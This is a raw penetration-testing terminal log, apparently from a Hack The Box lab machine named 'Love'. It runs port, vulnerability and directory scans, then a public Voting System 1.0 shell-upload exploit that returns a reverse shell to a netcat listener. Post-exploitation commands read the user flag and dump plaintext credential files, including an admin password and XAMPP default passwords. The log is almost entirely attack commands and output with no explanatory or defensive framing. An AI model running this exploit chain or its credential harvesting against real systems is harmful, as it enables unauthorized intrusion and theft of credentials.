$ nmap -p- -T4 -A 10.10.10.239
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| Kerberos, NCP, NULL, afp:
|_ Host '10.10.14.133' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2021-05-05T21:46:26+00:00; +32m26s from scanner time.
| tls-alpn:
|_ http/1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: mean: 2h17m26s, deviation: 3h30m01s, median: 32m25s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-05T14:46:07-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-05T21:46:09
|_ start_date: N/A
$ nikto -h http://10.10.10.239
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
$ dirb http://10.10.10.239
---- Scanning URL: http://10.10.10.239/ ----
==> DIRECTORY: http://10.10.10.239/admin/
==> DIRECTORY: http://10.10.10.239/Admin/
==> DIRECTORY: http://10.10.10.239/ADMIN/
+ http://10.10.10.239/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/cgi-bin/ (CODE:403|SIZE:302)
+ http://10.10.10.239/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/dist/
+ http://10.10.10.239/examples (CODE:503|SIZE:402)
==> DIRECTORY: http://10.10.10.239/images/
==> DIRECTORY: http://10.10.10.239/Images/
==> DIRECTORY: http://10.10.10.239/includes/
+ http://10.10.10.239/index.php (CODE:200|SIZE:4388)
+ http://10.10.10.239/licenses (CODE:403|SIZE:421)
+ http://10.10.10.239/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/phpmyadmin (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/plugins/
+ http://10.10.10.239/prn (CODE:403|SIZE:302)
+ http://10.10.10.239/server-info (CODE:403|SIZE:421)
+ http://10.10.10.239/server-status (CODE:403|SIZE:421)
+ http://10.10.10.239/webalizer (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/admin/ ----
+ http://10.10.10.239/admin/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/admin/includes/
+ http://10.10.10.239/admin/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/admin/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/prn (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/Admin/ ----
+ http://10.10.10.239/Admin/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/Admin/includes/
+ http://10.10.10.239/Admin/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/Admin/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/prn (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/ADMIN/ ----
+ http://10.10.10.239/ADMIN/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/ADMIN/includes/
+ http://10.10.10.239/ADMIN/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/ADMIN/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/prn (CODE:403|SIZE:302)
---- Entering directory: http://10.10.10.239/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/Admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.239/ADMIN/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
Voting System 1.0 Shell Upload
https://packetstormsecurity.com/files/161031/Voting-System-1.0-Shell-Upload.html
kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888
kali@kali:~/0.htb/machines/Love239$ python3 shellupload.py
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully
kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.239] 53061
b374k shell : connected
Microsoft Windows [Version 10.0.19042.928]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>
C:\xampp\htdocs\omrs\images>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs\images
05/06/2021 06:08 AM <DIR> .
05/06/2021 06:08 AM <DIR> ..
05/06/2021 06:08 AM 5,632 D3fa1t_shell.exe
05/18/2018 08:10 AM 4,240 facebook-profile-image.jpeg
04/12/2021 03:53 PM 0 index.html.txt
01/27/2021 12:08 AM 844 index.jpeg
08/24/2017 04:00 AM 26,644 profile.jpg
05/06/2021 06:08 AM 6,495 shell.php
6 File(s) 43,855 bytes
2 Dir(s) 2,232,213,504 bytes free
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
8086de462d74e656846ea860579218e5
C:\xampp\htdocs\omrs\images>cd ..
cd ..
C:\xampp\htdocs\omrs>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs
04/13/2021 09:54 AM <DIR> .
04/13/2021 09:54 AM <DIR> ..
04/12/2021 08:27 AM <DIR> admin
04/12/2021 08:29 AM <DIR> bower_components
04/12/2021 08:29 AM <DIR> dist
05/18/2018 10:50 AM 7,480 home.php
05/06/2021 06:08 AM <DIR> images
04/12/2021 08:29 AM <DIR> includes
05/16/2018 12:34 PM 1,572 index.php
05/16/2018 12:31 PM 668 login.php
04/26/2018 01:25 PM 84 logout.php
04/12/2021 08:29 AM <DIR> plugins
05/17/2018 11:02 AM 1,705 preview.php
05/18/2018 10:49 AM 1,502 submit_ballot.php
04/12/2021 08:29 AM <DIR> tcpdf
04/12/2021 08:29 AM <DIR> votesystem
6 File(s) 13,011 bytes
10 Dir(s) 2,232,205,312 bytes free
C:\xampp\htdocs\omrs>
C:\xampp\htdocs>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs
04/12/2021 08:29 AM <DIR> .
04/12/2021 08:29 AM <DIR> ..
08/27/2019 07:02 AM 3,607 applications.html
08/27/2019 07:02 AM 177 bitnami.css
04/12/2021 08:16 AM <DIR> dashboard
07/16/2015 08:32 AM 30,894 favicon.ico
04/12/2021 08:29 AM <DIR> FFS
04/12/2021 08:16 AM <DIR> img
07/16/2015 08:32 AM 260 index.php
04/13/2021 09:54 AM <DIR> omrs
04/12/2021 08:29 AM <DIR> passwordmanager
04/12/2021 08:16 AM <DIR> webalizer
04/12/2021 08:16 AM <DIR> xampp
4 File(s) 34,938 bytes
9 Dir(s) 2,208,567,296 bytes free
Directory of C:\xampp\htdocs\passwordmanager
04/12/2021 08:29 AM <DIR> .
04/12/2021 08:29 AM <DIR> ..
04/12/2021 12:25 PM 45 creds.txt
01/27/2021 06:32 PM 4,720 index.php
2 File(s) 4,765 bytes
2 Dir(s) 2,208,235,520 bytes free
C:\xampp\htdocs\passwordmanager>type creds.txt
type creds.txt
Vote Admin Creds admin: @LoveIsInTheAir!!!!
C:\xampp\webdav>type webdav.txt
type webdav.txt
WEB-DAV f�r den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente �ber den Apache2.
Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: http://localhost/webdav/
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben.
Lokales Directory: /xampp/webdav/
C:\xampp>type passwords.txt
type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
WinRM (port 5985,5986)